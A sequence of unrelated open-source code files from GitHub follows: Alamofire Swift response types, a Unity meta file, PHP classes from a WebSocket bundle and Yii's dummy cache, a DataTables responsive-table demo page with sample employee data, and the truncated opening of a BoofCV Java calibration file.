CustomDebugStringConvertible { /// The textual representation used when written to an output stream, which includes whether the result was a /// success or failure. public var description: String { return result.debugDescription } /// The debug textual representation used when written to an output stream, which includes the URL request, the URL /// response, the server data, the response serialization result and the timeline. public var debugDescription: String { var output: [String] = [] output.append(request != nil ? "[Request]: \(request!.httpMethod ?? "GET") \(request!)" : "[Request]: nil") output.append(response != nil ? "[Response]: \(response!)" : "[Response]: nil") output.append("[Data]: \(data?.count ?? 0) bytes") output.append("[Result]: \(result.debugDescription)") output.append("[Timeline]: \(timeline.debugDescription)") return output.joined(separator: "\n") } } // MARK: - extension DataResponse { /// Evaluates the specified closure when the result of this `DataResponse` is a success, passing the unwrapped /// result value as a parameter. /// /// Use the `map` method with a closure that does not throw. For example: /// /// let possibleData: DataResponse<Data> = ... /// let possibleInt = possibleData.map { $0.count } /// /// - parameter transform: A closure that takes the success value of the instance's result. /// /// - returns: A `DataResponse` whose result wraps the value returned by the given closure. If this instance's /// result is a failure, returns a response wrapping the same failure. public func map<T>(_ transform: (Value) -> T) -> DataResponse<T> { var response = DataResponse<T>( request: request, response: self.response, data: data, result: result.map(transform), timeline: timeline ) response._metrics = _metrics return response } /// Evaluates the given closure when the result of this `DataResponse` is a success, passing the unwrapped result /// value as a parameter. /// /// Use the `flatMap` method with a closure that may throw an error. For example: /// /// let possibleData: DataResponse<Data> = ... /// let possibleObject = possibleData.flatMap { /// try JSONSerialization.jsonObject(with: $0) /// } /// /// - parameter transform: A closure that takes the success value of the instance's result. /// /// - returns: A success or failure `DataResponse` depending on the result of the given closure. If this instance's /// result is a failure, returns the same failure. public func flatMap<T>(_ transform: (Value) throws -> T) -> DataResponse<T> { var response = DataResponse<T>( request: request, response: self.response, data: data, result: result.flatMap(transform), timeline: timeline ) response._metrics = _metrics return response } } // MARK: - /// Used to store all data associated with an non-serialized response of a download request. public struct DefaultDownloadResponse { /// The URL request sent to the server. public let request: URLRequest? /// The server's response to the URL request. public let response: HTTPURLResponse? /// The temporary destination URL of the data returned from the server. public let temporaryURL: URL? /// The final destination URL of the data returned from the server if it was moved. public let destinationURL: URL? /// The resume data generated if the request was cancelled. public let resumeData: Data? /// The error encountered while executing or validating the request. public let error: Error? /// The timeline of the complete lifecycle of the request. public let timeline: Timeline var _metrics: AnyObject? /// Creates a `DefaultDownloadResponse` instance from the specified parameters. /// /// - Parameters: /// - request: The URL request sent to the server. /// - response: The server's response to the URL request. /// - temporaryURL: The temporary destination URL of the data returned from the server. /// - destinationURL: The final destination URL of the data returned from the server if it was moved. /// - resumeData: The resume data generated if the request was cancelled. /// - error: The error encountered while executing or validating the request. /// - timeline: The timeline of the complete lifecycle of the request. `Timeline()` by default. /// - metrics: The task metrics containing the request / response statistics. `nil` by default. public init( request: URLRequest?, response: HTTPURLResponse?, temporaryURL: URL?, destinationURL: URL?, resumeData: Data?, error: Error?, timeline: Timeline = Timeline(), metrics: AnyObject? = nil) { self.request = request self.response = response self.temporaryURL = temporaryURL self.destinationURL = destinationURL self.resumeData = resumeData self.error = error self.timeline = timeline } } // MARK: - /// Used to store all data associated with a serialized response of a download request. public struct DownloadResponse<Value> { /// The URL request sent to the server. public let request: URLRequest? /// The server's response to the URL request. public let response: HTTPURLResponse? /// The temporary destination URL of the data returned from the server. public let temporaryURL: URL? /// The final destination URL of the data returned from the server if it was moved. public let destinationURL: URL? /// The resume data generated if the request was cancelled. public let resumeData: Data? /// The result of response serialization. public let result: Result<Value> /// The timeline of the complete lifecycle of the request. public let timeline: Timeline /// Returns the associated value of the result if it is a success, `nil` otherwise. public var value: Value? { return result.value } /// Returns the associated error value if the result if it is a failure, `nil` otherwise. public var error: Error? { return result.error } var _metrics: AnyObject? /// Creates a `DownloadResponse` instance with the specified parameters derived from response serialization. /// /// - parameter request: The URL request sent to the server. /// - parameter response: The server's response to the URL request. /// - parameter temporaryURL: The temporary destination URL of the data returned from the server. /// - parameter destinationURL: The final destination URL of the data returned from the server if it was moved. /// - parameter resumeData: The resume data generated if the request was cancelled. /// - parameter result: The result of response serialization. /// - parameter timeline: The timeline of the complete lifecycle of the `Request`. Defaults to `Timeline()`. /// /// - returns: The new `DownloadResponse` instance. public init( request: URLRequest?, response: HTTPURLResponse?, temporaryURL: URL?, destinationURL: URL?, resumeData: Data?, result: Result<Value>, timeline: Timeline = Timeline()) { self.request = request self.response = response self.temporaryURL = temporaryURL self.destinationURL = destinationURL self.resumeData = resumeData self.result = result self.timeline = timeline } } // MARK: - extension DownloadResponse: CustomStringConvertible, CustomDebugStringConvertible { /// The textual representation used when written to an output stream, which includes whether the result was a /// success or failure. public var description: String { return result.debugDescription } /// The debug textual representation used when written to an output stream, which includes the URL request, the URL /// response, the temporary and destination URLs, the resume data, the response serialization result and the /// timeline. public var debugDescription: String { var output: [String] = [] output.append(request != nil ? "[Request]: \(request!.httpMethod ?? "GET") \(request!)" : "[Request]: nil") output.append(response != nil ? "[Response]: \(response!)" : "[Response]: nil") output.append("[TemporaryURL]: \(temporaryURL?.path ?? "nil")") output.append("[DestinationURL]: \(destinationURL?.path ?? "nil")") output.append("[ResumeData]: \(resumeData?.count ?? 0) bytes") output.append("[Result]: \(result.debugDescription)") output.append("[Timeline]: \(timeline.debugDescription)") return output.joined(separator: "\n") } } // MARK: - extension DownloadResponse { /// Evaluates the given closure when the result of this `DownloadResponse` is a success, passing the unwrapped /// result value as a parameter. /// /// Use the `map` method with a closure that does not throw. For example: /// /// let possibleData: DownloadResponse<Data> = ... /// let possibleInt = possibleData.map { $0.count } /// /// - parameter transform: A closure that takes the success value of the instance's result. /// /// - returns: A `DownloadResponse` whose result wraps the value returned by the given closure. If this instance's /// result is a failure, returns a response wrapping the same failure. public func map<T>(_ transform: (Value) -> T) -> DownloadResponse<T> { var response = DownloadResponse<T>( request: request, response: self.response, temporaryURL: temporaryURL, destinationURL: destinationURL, resumeData: resumeData, result: result.map(transform), timeline: timeline ) response._metrics = _metrics return response } /// Evaluates the given closure when the result of this `DownloadResponse` is a success, passing the unwrapped /// result value as a parameter. /// /// Use the `flatMap` method with a closure that may throw an error. For example: /// /// let possibleData: DownloadResponse<Data> = ... /// let possibleObject = possibleData.flatMap { /// try JSONSerialization.jsonObject(with: $0) /// } /// /// - parameter transform: A closure that takes the success value of the instance's result. /// /// - returns: A success or failure `DownloadResponse` depending on the result of the given closure. If this /// instance's result is a failure, returns the same failure. public func flatMap<T>(_ transform: (Value) throws -> T) -> DownloadResponse<T> { var response = DownloadResponse<T>( request: request, response: self.response, temporaryURL: temporaryURL, destinationURL: destinationURL, resumeData: resumeData, result: result.flatMap(transform), timeline: timeline ) response._metrics = _metrics return response } } // MARK: - protocol Response { /// The task metrics containing the request / response statistics. var _metrics: AnyObject? { get set } mutating func add(_ metrics: AnyObject?) } extension Response { mutating func add(_ metrics: AnyObject?) { #if !os(watchOS) guard #available(iOS 10.0, macOS 10.12, tvOS 10.0, *) else { return } guard let metrics = metrics as? URLSessionTaskMetrics else { return } _metrics = metrics #endif } } // MARK: - @available(iOS 10.0, macOS 10.12, tvOS 10.0, *) extension DefaultDataResponse: Response { #if !os(watchOS) /// The task metrics containing the request / response statistics. public var metrics: URLSessionTaskMetrics? { return _metrics as? URLSessionTaskMetrics } #endif } @available(iOS 10.0, macOS 10.12, tvOS 10.0, *) extension DataResponse: Response { #if !os(watchOS) /// The task metrics containing the request / response statistics. public var metrics: URLSessionTaskMetrics? { return _metrics as? URLSessionTaskMetrics } #endif } @available(iOS 10.0, macOS 10.12, tvOS 10.0, *) extension DefaultDownloadResponse: Response { #if !os(watchOS) /// The task metrics containing the request / response statistics. public var metrics: URLSessionTaskMetrics? { return _metrics as? URLSessionTaskMetrics } #endif } @available(iOS 10.0, macOS 10.12, tvOS 10.0, *) extension DownloadResponse: Response { #if !os(watchOS) /// The task metrics containing the request / response statistics. public var metrics: URLSessionTaskMetrics? { return _metrics as? URLSessionTaskMetrics } #endif }
{ "pile_set_name": "Github" }
fileFormatVersion: 2 guid: 607a5643efb168f429e438f7d6ad270a timeCreated: 1464350149 licenseType: Store ShaderImporter: defaultTextures: [] userData: assetBundleName: assetBundleVariant:
{ "pile_set_name": "Github" }
<?php declare(strict_types=1); namespace Gos\Bundle\WebSocketBundle\Event; trigger_deprecation('gos/web-socket-bundle', '3.1', 'The "%s" class is deprecated and will be removed in 4.0, use the symfony/messenger component instead.', PushHandlerFailEvent::class); /** * @deprecated to be removed in 4.0, use the symfony/messenger component instead */ final class PushHandlerFailEvent extends PushHandlerEvent { }
{ "pile_set_name": "Github" }
recursive-include tests *.py *.sh Dockerfile
{ "pile_set_name": "Github" }
<?php /** * CDummyCache class file. * * @author Qiang Xue <[email protected]> * @link http://www.yiiframework.com/ * @copyright 2008-2013 Yii Software LLC * @license http://www.yiiframework.com/license/ */ /** * CDummyCache is a placeholder cache component. * * CDummyCache does not cache anything. It is provided so that one can always configure * a 'cache' application component and he does not need to check if Yii::app()->cache is null or not. * By replacing CDummyCache with some other cache component, one can quickly switch from * non-caching mode to caching mode. * * @author Qiang Xue <[email protected]> * @package system.caching * @since 1.0 */ class CDummyCache extends CApplicationComponent implements ICache, ArrayAccess { /** * @var string a string prefixed to every cache key so that it is unique. Defaults to {@link CApplication::getId() application ID}. */ public $keyPrefix; /** * Initializes the application component. * This method overrides the parent implementation by setting default cache key prefix. */ public function init() { parent::init(); if($this->keyPrefix===null) $this->keyPrefix=Yii::app()->getId(); } /** * Retrieves a value from cache with a specified key. * @param string $id a key identifying the cached value * @return mixed the value stored in cache, false if the value is not in the cache, expired or the dependency has changed. */ public function get($id) { return false; } /** * Retrieves multiple values from cache with the specified keys. * Some caches (such as memcache, apc) allow retrieving multiple cached values at one time, * which may improve the performance since it reduces the communication cost. * In case a cache doesn't support this feature natively, it will be simulated by this method. * @param array $ids list of keys identifying the cached values * @return array list of cached values corresponding to the specified keys. The array * is returned in terms of (key,value) pairs. * If a value is not cached or expired, the corresponding array value will be false. */ public function mget($ids) { $results=array(); foreach($ids as $id) $results[$id]=false; return $results; } /** * Stores a value identified by a key into cache. * If the cache already contains such a key, the existing value and * expiration time will be replaced with the new ones. * * @param string $id the key identifying the value to be cached * @param mixed $value the value to be cached * @param integer $expire the number of seconds in which the cached value will expire. 0 means never expire. * @param ICacheDependency $dependency dependency of the cached item. If the dependency changes, the item is labeled invalid. * @return boolean true if the value is successfully stored into cache, false otherwise */ public function set($id,$value,$expire=0,$dependency=null) { return true; } /** * Stores a value identified by a key into cache if the cache does not contain this key. * Nothing will be done if the cache already contains the key. * @param string $id the key identifying the value to be cached * @param mixed $value the value to be cached * @param integer $expire the number of seconds in which the cached value will expire. 0 means never expire. * @param ICacheDependency $dependency dependency of the cached item. If the dependency changes, the item is labeled invalid. * @return boolean true if the value is successfully stored into cache, false otherwise */ public function add($id,$value,$expire=0,$dependency=null) { return true; } /** * Deletes a value with the specified key from cache * @param string $id the key of the value to be deleted * @return boolean if no error happens during deletion */ public function delete($id) { return true; } /** * Deletes all values from cache. * Be careful of performing this operation if the cache is shared by multiple applications. * @return boolean whether the flush operation was successful. * @throws CException if this method is not overridden by child classes */ public function flush() { return true; } /** * Returns whether there is a cache entry with a specified key. * This method is required by the interface ArrayAccess. * @param string $id a key identifying the cached value * @return boolean */ public function offsetExists($id) { return false; } /** * Retrieves the value from cache with a specified key. * This method is required by the interface ArrayAccess. * @param string $id a key identifying the cached value * @return mixed the value stored in cache, false if the value is not in the cache or expired. */ public function offsetGet($id) { return false; } /** * Stores the value identified by a key into cache. * If the cache already contains such a key, the existing value will be * replaced with the new ones. To add expiration and dependencies, use the set() method. * This method is required by the interface ArrayAccess. * @param string $id the key identifying the value to be cached * @param mixed $value the value to be cached */ public function offsetSet($id, $value) { } /** * Deletes the value with the specified key from cache * This method is required by the interface ArrayAccess. * @param string $id the key of the value to be deleted * @return boolean if no error happens during deletion */ public function offsetUnset($id) { } }
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <link rel="shortcut icon" type="image/ico" href="http://www.datatables.net/favicon.ico"> <meta name="viewport" content="initial-scale=1.0, maximum-scale=2.0"> <title>Responsive example - Disable child rows</title> <link rel="stylesheet" type="text/css" href="../../../../media/css/jquery.dataTables.css"> <link rel="stylesheet" type="text/css" href="../../css/dataTables.responsive.css"> <link rel="stylesheet" type="text/css" href="../../../../examples/resources/syntax/shCore.css"> <link rel="stylesheet" type="text/css" href="../../../../examples/resources/demo.css"> <style type="text/css" class="init"> </style> <script type="text/javascript" language="javascript" src="../../../../media/js/jquery.js"></script> <script type="text/javascript" language="javascript" src="../../../../media/js/jquery.dataTables.js"></script> <script type="text/javascript" language="javascript" src="../../js/dataTables.responsive.js"></script> <script type="text/javascript" language="javascript" src="../../../../examples/resources/syntax/shCore.js"></script> <script type="text/javascript" language="javascript" src="../../../../examples/resources/demo.js"></script> <script type="text/javascript" language="javascript" class="init"> $(document).ready(function() { $('#example').DataTable( { responsive: { details: false } } ); } ); </script> </head> <body class="dt-example"> <div class="container"> <section> <h1>Responsive example <span>Disable child rows</span></h1> <div class="info"> <p>By default, when Responsive collapses a table, it will show an option for the end user to expand the row, showing the details of the hidden columns in a child row. This can be disabled using the <a href="//datatables.net/extensions/responsive/reference/option/responsive.details"><code class="option" title= "Responsive initialisation option">responsive.details<span>R</span></code></a> option and setting it to <code>false</code>, as shown in the example below. In this case the hidden data is not directly accessible to the end user.</p> </div> <table id="example" class="display nowrap" cellspacing="0" width="100%"> <thead> <tr> <th>First name</th> <th>Last name</th> <th>Position</th> <th>Office</th> <th>Age</th> <th>Start date</th> <th>Salary</th> <th>Extn.</th> <th>E-mail</th> </tr> </thead> <tbody> <tr> <td>Tiger</td> <td>Nixon</td> <td>System Architect</td> <td>Edinburgh</td> <td>61</td> <td>2011/04/25</td> <td>$320,800</td> <td>5421</td> <td>[email protected]</td> </tr> <tr> <td>Garrett</td> <td>Winters</td> <td>Accountant</td> <td>Tokyo</td> <td>63</td> <td>2011/07/25</td> <td>$170,750</td> <td>8422</td> <td>[email protected]</td> </tr> <tr> <td>Ashton</td> <td>Cox</td> <td>Junior Technical Author</td> <td>San Francisco</td> <td>66</td> <td>2009/01/12</td> <td>$86,000</td> <td>1562</td> <td>[email protected]</td> </tr> <tr> <td>Cedric</td> <td>Kelly</td> <td>Senior Javascript Developer</td> <td>Edinburgh</td> <td>22</td> <td>2012/03/29</td> <td>$433,060</td> <td>6224</td> <td>[email protected]</td> </tr> <tr> <td>Airi</td> <td>Satou</td> <td>Accountant</td> <td>Tokyo</td> <td>33</td> <td>2008/11/28</td> <td>$162,700</td> <td>5407</td> <td>[email protected]</td> </tr> <tr> <td>Brielle</td> <td>Williamson</td> <td>Integration Specialist</td> <td>New York</td> <td>61</td> <td>2012/12/02</td> <td>$372,000</td> <td>4804</td> <td>[email protected]</td> </tr> <tr> <td>Herrod</td> <td>Chandler</td> <td>Sales Assistant</td> <td>San Francisco</td> <td>59</td> <td>2012/08/06</td> <td>$137,500</td> <td>9608</td> <td>[email protected]</td> </tr> <tr> <td>Rhona</td> <td>Davidson</td> <td>Integration Specialist</td> <td>Tokyo</td> <td>55</td> <td>2010/10/14</td> <td>$327,900</td> <td>6200</td> <td>[email protected]</td> </tr> <tr> <td>Colleen</td> <td>Hurst</td> <td>Javascript Developer</td> <td>San Francisco</td> <td>39</td> <td>2009/09/15</td> <td>$205,500</td> <td>2360</td> <td>[email protected]</td> </tr> <tr> <td>Sonya</td> <td>Frost</td> <td>Software Engineer</td> <td>Edinburgh</td> <td>23</td> <td>2008/12/13</td> <td>$103,600</td> <td>1667</td> <td>[email protected]</td> </tr> <tr> <td>Jena</td> <td>Gaines</td> <td>Office Manager</td> <td>London</td> <td>30</td> <td>2008/12/19</td> <td>$90,560</td> <td>3814</td> <td>[email protected]</td> </tr> <tr> <td>Quinn</td> <td>Flynn</td> <td>Support Lead</td> <td>Edinburgh</td> <td>22</td> <td>2013/03/03</td> <td>$342,000</td> <td>9497</td> <td>[email protected]</td> </tr> <tr> <td>Charde</td> <td>Marshall</td> <td>Regional Director</td> <td>San Francisco</td> <td>36</td> <td>2008/10/16</td> <td>$470,600</td> <td>6741</td> <td>[email protected]</td> </tr> <tr> <td>Haley</td> <td>Kennedy</td> <td>Senior Marketing Designer</td> <td>London</td> <td>43</td> <td>2012/12/18</td> <td>$313,500</td> <td>3597</td> <td>[email protected]</td> </tr> <tr> <td>Tatyana</td> <td>Fitzpatrick</td> <td>Regional Director</td> <td>London</td> <td>19</td> <td>2010/03/17</td> <td>$385,750</td> <td>1965</td> <td>[email protected]</td> </tr> <tr> <td>Michael</td> <td>Silva</td> <td>Marketing Designer</td> <td>London</td> <td>66</td> <td>2012/11/27</td> <td>$198,500</td> <td>1581</td> <td>[email protected]</td> </tr> <tr> <td>Paul</td> <td>Byrd</td> <td>Chief Financial Officer (CFO)</td> <td>New York</td> <td>64</td> <td>2010/06/09</td> <td>$725,000</td> <td>3059</td> <td>[email protected]</td> </tr> <tr> <td>Gloria</td> <td>Little</td> <td>Systems Administrator</td> <td>New York</td> <td>59</td> <td>2009/04/10</td> <td>$237,500</td> <td>1721</td> <td>[email protected]</td> </tr> <tr> <td>Bradley</td> <td>Greer</td> <td>Software Engineer</td> <td>London</td> <td>41</td> <td>2012/10/13</td> <td>$132,000</td> <td>2558</td> <td>[email protected]</td> </tr> <tr> <td>Dai</td> <td>Rios</td> <td>Personnel Lead</td> <td>Edinburgh</td> <td>35</td> <td>2012/09/26</td> <td>$217,500</td> <td>2290</td> <td>[email protected]</td> </tr> <tr> <td>Jenette</td> <td>Caldwell</td> <td>Development Lead</td> <td>New York</td> <td>30</td> <td>2011/09/03</td> <td>$345,000</td> <td>1937</td> <td>[email protected]</td> </tr> <tr> <td>Yuri</td> <td>Berry</td> <td>Chief Marketing Officer (CMO)</td> <td>New York</td> <td>40</td> <td>2009/06/25</td> <td>$675,000</td> <td>6154</td> <td>[email protected]</td> </tr> <tr> <td>Caesar</td> <td>Vance</td> <td>Pre-Sales Support</td> <td>New York</td> <td>21</td> <td>2011/12/12</td> <td>$106,450</td> <td>8330</td> <td>[email protected]</td> </tr> <tr> <td>Doris</td> <td>Wilder</td> <td>Sales Assistant</td> <td>Sidney</td> <td>23</td> <td>2010/09/20</td> <td>$85,600</td> <td>3023</td> <td>[email protected]</td> </tr> <tr> <td>Angelica</td> <td>Ramos</td> <td>Chief Executive Officer (CEO)</td> <td>London</td> <td>47</td> <td>2009/10/09</td> <td>$1,200,000</td> <td>5797</td> <td>[email protected]</td> </tr> <tr> <td>Gavin</td> <td>Joyce</td> <td>Developer</td> <td>Edinburgh</td> <td>42</td> <td>2010/12/22</td> <td>$92,575</td> <td>8822</td> <td>[email protected]</td> </tr> <tr> <td>Jennifer</td> <td>Chang</td> <td>Regional Director</td> <td>Singapore</td> <td>28</td> <td>2010/11/14</td> <td>$357,650</td> <td>9239</td> <td>[email protected]</td> </tr> <tr> <td>Brenden</td> <td>Wagner</td> <td>Software Engineer</td> <td>San Francisco</td> <td>28</td> <td>2011/06/07</td> <td>$206,850</td> <td>1314</td> <td>[email protected]</td> </tr> <tr> <td>Fiona</td> <td>Green</td> <td>Chief Operating Officer (COO)</td> <td>San Francisco</td> <td>48</td> <td>2010/03/11</td> <td>$850,000</td> <td>2947</td> <td>[email protected]</td> </tr> <tr> <td>Shou</td> <td>Itou</td> <td>Regional Marketing</td> <td>Tokyo</td> <td>20</td> <td>2011/08/14</td> <td>$163,000</td> <td>8899</td> <td>[email protected]</td> </tr> <tr> <td>Michelle</td> <td>House</td> <td>Integration Specialist</td> <td>Sidney</td> <td>37</td> <td>2011/06/02</td> <td>$95,400</td> <td>2769</td> <td>[email protected]</td> </tr> <tr> <td>Suki</td> <td>Burks</td> <td>Developer</td> <td>London</td> <td>53</td> <td>2009/10/22</td> <td>$114,500</td> <td>6832</td> <td>[email protected]</td> </tr> <tr> <td>Prescott</td> <td>Bartlett</td> <td>Technical Author</td> <td>London</td> <td>27</td> <td>2011/05/07</td> <td>$145,000</td> <td>3606</td> <td>[email protected]</td> </tr> <tr> <td>Gavin</td> <td>Cortez</td> <td>Team Leader</td> <td>San Francisco</td> <td>22</td> <td>2008/10/26</td> <td>$235,500</td> <td>2860</td> <td>[email protected]</td> </tr> <tr> <td>Martena</td> <td>Mccray</td> <td>Post-Sales support</td> <td>Edinburgh</td> <td>46</td> <td>2011/03/09</td> <td>$324,050</td> <td>8240</td> <td>[email protected]</td> </tr> <tr> <td>Unity</td> <td>Butler</td> <td>Marketing Designer</td> <td>San Francisco</td> <td>47</td> <td>2009/12/09</td> <td>$85,675</td> <td>5384</td> <td>[email protected]</td> </tr> <tr> <td>Howard</td> <td>Hatfield</td> <td>Office Manager</td> <td>San Francisco</td> <td>51</td> <td>2008/12/16</td> <td>$164,500</td> <td>7031</td> <td>[email protected]</td> </tr> <tr> <td>Hope</td> <td>Fuentes</td> <td>Secretary</td> <td>San Francisco</td> <td>41</td> <td>2010/02/12</td> <td>$109,850</td> <td>6318</td> <td>[email protected]</td> </tr> <tr> <td>Vivian</td> <td>Harrell</td> <td>Financial Controller</td> <td>San Francisco</td> <td>62</td> <td>2009/02/14</td> <td>$452,500</td> <td>9422</td> <td>[email protected]</td> </tr> <tr> <td>Timothy</td> <td>Mooney</td> <td>Office Manager</td> <td>London</td> <td>37</td> <td>2008/12/11</td> <td>$136,200</td> <td>7580</td> <td>[email protected]</td> </tr> <tr> <td>Jackson</td> <td>Bradshaw</td> <td>Director</td> <td>New York</td> <td>65</td> <td>2008/09/26</td> <td>$645,750</td> <td>1042</td> <td>[email protected]</td> </tr> <tr> <td>Olivia</td> <td>Liang</td> <td>Support Engineer</td> <td>Singapore</td> <td>64</td> <td>2011/02/03</td> <td>$234,500</td> <td>2120</td> <td>[email protected]</td> </tr> <tr> <td>Bruno</td> <td>Nash</td> <td>Software Engineer</td> <td>London</td> <td>38</td> <td>2011/05/03</td> <td>$163,500</td> <td>6222</td> <td>[email protected]</td> </tr> <tr> <td>Sakura</td> <td>Yamamoto</td> <td>Support Engineer</td> <td>Tokyo</td> <td>37</td> <td>2009/08/19</td> <td>$139,575</td> <td>9383</td> <td>[email protected]</td> </tr> <tr> <td>Thor</td> <td>Walton</td> <td>Developer</td> <td>New York</td> <td>61</td> <td>2013/08/11</td> <td>$98,540</td> <td>8327</td> <td>[email protected]</td> </tr> <tr> <td>Finn</td> <td>Camacho</td> <td>Support Engineer</td> <td>San Francisco</td> <td>47</td> <td>2009/07/07</td> <td>$87,500</td> <td>2927</td> <td>[email protected]</td> </tr> <tr> <td>Serge</td> <td>Baldwin</td> <td>Data Coordinator</td> <td>Singapore</td> <td>64</td> <td>2012/04/09</td> <td>$138,575</td> <td>8352</td> <td>[email protected]</td> </tr> <tr> <td>Zenaida</td> <td>Frank</td> <td>Software Engineer</td> <td>New York</td> <td>63</td> <td>2010/01/04</td> <td>$125,250</td> <td>7439</td> <td>[email protected]</td> </tr> <tr> <td>Zorita</td> <td>Serrano</td> <td>Software Engineer</td> <td>San Francisco</td> <td>56</td> <td>2012/06/01</td> <td>$115,000</td> <td>4389</td> <td>[email protected]</td> </tr> <tr> <td>Jennifer</td> <td>Acosta</td> <td>Junior Javascript Developer</td> <td>Edinburgh</td> <td>43</td> <td>2013/02/01</td> <td>$75,650</td> <td>3431</td> <td>[email protected]</td> </tr> <tr> <td>Cara</td> <td>Stevens</td> <td>Sales Assistant</td> <td>New York</td> <td>46</td> <td>2011/12/06</td> <td>$145,600</td> <td>3990</td> <td>[email protected]</td> </tr> <tr> <td>Hermione</td> <td>Butler</td> <td>Regional Director</td> <td>London</td> <td>47</td> <td>2011/03/21</td> <td>$356,250</td> <td>1016</td> <td>[email protected]</td> </tr> <tr> <td>Lael</td> <td>Greer</td> <td>Systems Administrator</td> <td>London</td> <td>21</td> <td>2009/02/27</td> <td>$103,500</td> <td>6733</td> <td>[email protected]</td> </tr> <tr> <td>Jonas</td> <td>Alexander</td> <td>Developer</td> <td>San Francisco</td> <td>30</td> <td>2010/07/14</td> <td>$86,500</td> <td>8196</td> <td>[email protected]</td> </tr> <tr> <td>Shad</td> <td>Decker</td> <td>Regional Director</td> <td>Edinburgh</td> <td>51</td> <td>2008/11/13</td> <td>$183,000</td> <td>6373</td> <td>[email protected]</td> </tr> <tr> <td>Michael</td> <td>Bruce</td> <td>Javascript Developer</td> <td>Singapore</td> <td>29</td> <td>2011/06/27</td> <td>$183,000</td> <td>5384</td> <td>[email protected]</td> </tr> <tr> <td>Donna</td> <td>Snider</td> <td>Customer Support</td> <td>New York</td> <td>27</td> <td>2011/01/25</td> <td>$112,000</td> <td>4226</td> <td>[email protected]</td> </tr> </tbody> </table> <ul class="tabs"> <li class="active">Javascript</li> <li>HTML</li> <li>CSS</li> <li>Ajax</li> <li>Server-side script</li> </ul> <div class="tabs"> <div class="js"> <p>The Javascript shown below is used to initialise the table shown in this example:</p><code class="multiline language-js">$(document).ready(function() { $('#example').DataTable( { responsive: { details: false } } ); } );</code> <p>In addition to the above code, the following Javascript library files are loaded for use in this example:</p> <ul> <li><a href="../../../../media/js/jquery.js">../../../../media/js/jquery.js</a></li> <li><a href="../../../../media/js/jquery.dataTables.js">../../../../media/js/jquery.dataTables.js</a></li> <li><a href="../../js/dataTables.responsive.js">../../js/dataTables.responsive.js</a></li> </ul> </div> <div class="table"> <p>The HTML shown below is the raw HTML table element, before it has been enhanced by DataTables:</p> </div> <div class="css"> <div> <p>This example uses a little bit of additional CSS beyond what is loaded from the library files (below), in order to correctly display the table. The additional CSS used is shown below:</p><code class="multiline language-css"></code> </div> <p>The following CSS library files are loaded for use in this example to provide the styling of the table:</p> <ul> <li><a href="../../../../media/css/jquery.dataTables.css">../../../../media/css/jquery.dataTables.css</a></li> <li><a href="../../css/dataTables.responsive.css">../../css/dataTables.responsive.css</a></li> </ul> </div> <div class="ajax"> <p>This table loads data by Ajax. The latest data that has been loaded is shown below. This data will update automatically as any additional data is loaded.</p> </div> <div class="php"> <p>The script used to perform the server-side processing for this table is shown below. Please note that this is just an example script using PHP. Server-side processing scripts can be written in any language, using <a href="//datatables.net/manual/server-side">the protocol described in the DataTables documentation</a>.</p> </div> </div> </section> </div> <section> <div class="footer"> <div class="gradient"></div> <div class="liner"> <h2>Other examples</h2> <div class="toc"> <div class="toc-group"> <h3><a href="../initialisation/index.html">Basic initialisation</a></h3> <ul class="toc"> <li><a href="../initialisation/className.html">Class name</a></li> <li><a href="../initialisation/option.html">Configuration option</a></li> <li><a href="../initialisation/new.html">`new` constructor</a></li> <li><a href="../initialisation/ajax.html">Ajax data</a></li> <li><a href="../initialisation/default.html">Default initialisation</a></li> </ul> </div> <div class="toc-group"> <h3><a href="../styling/index.html">Styling</a></h3> <ul class="toc"> <li><a href="../styling/bootstrap.html">Bootstrap styling</a></li> <li><a href="../styling/foundation.html">Foundation styling</a></li> <li><a href="../styling/scrolling.html">Vertical scrolling</a></li> <li><a href="../styling/compact.html">Compact styling</a></li> </ul> </div> <div class="toc-group"> <h3><a href="../display-control/index.html">Display control</a></h3> <ul class="toc"> <li><a href="../display-control/auto.html">Automatic column hiding</a></li> <li><a href="../display-control/classes.html">Class control</a></li> <li><a href="../display-control/init-classes.html">Assigned class control</a></li> <li><a href="../display-control/fixedHeader.html">With FixedHeader</a></li> <li><a href="../display-control/complexHeader.html">Complex headers (rowspan / colspan)</a></li> </ul> </div> <div class="toc-group"> <h3><a href="./index.html">Child rows</a></h3> <ul class="toc active"> <li class="active"><a href="./disable-child-rows.html">Disable child rows</a></li> <li><a href="./column-control.html">Column controlled child rows</a></li> <li><a href="./right-column.html">Column control - right</a></li> <li><a href="./whole-row-control.html">Whole row child row control</a></li> <li><a href="./custom-renderer.html">Custom child row renderer</a></li> </ul> </div> </div> <div class="epilogue"> <p>Please refer to the <a href="http://www.datatables.net">DataTables documentation</a> for full information about its API properties and methods.<br> Additionally, there are a wide range of <a href="http://www.datatables.net/extras">extras</a> and <a href="http://www.datatables.net/plug-ins">plug-ins</a> which extend the capabilities of DataTables.</p> <p class="copyright">DataTables designed and created by <a href="http://www.sprymedia.co.uk">SpryMedia Ltd</a> &#169; 2007-2015<br> DataTables is licensed under the <a href="http://www.datatables.net/mit">MIT license</a>.</p> </div> </div> </div> </section> </body> </html>
{ "pile_set_name": "Github" }
/* * Copyright (c) 2011-2020, Peter Abeles. All Rights Reserved. * * This file is part of BoofCV (http://boofcv.org). * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package boofcv.alg.geo.calibration; import boofcv.abst.geo.bundle.BundleAdjustment; import boofcv.abst.geo.bundle.SceneObservations; import boofcv.abst.geo.bundle.SceneStructureMetric; import boofcv.abst.geo.calibration.ImageResults; import boofcv.alg.geo.bundle.BundleAdjustmentMetricResidualFunction; import boofcv.alg.geo.bundle.CodecSceneStructureMetric; import boofcv.alg.geo.calibration.cameras.Zhang99Camera; import boofcv.factory.geo.ConfigBundleAdjustment; import boofcv.factory.geo.FactoryMultiView; import boofcv.struct.calib.CameraModel; import boofcv.struct.geo.PointIndex2D_F64; import georegression.struct.point.Point2D_F64; import georegression.struct.se.Se3_F64; import org.ddogleg.optimization.lm.ConfigLevenbergMarquardt; import org.ddogleg.struct.VerbosePrint; import org.ejml.data.DMatrixRMaj; import org.jetbrains.annotations.Nullable; import java.io.PrintStream; import java.util.ArrayList; import java.util.List; import java.util.Set; /** * <p> * 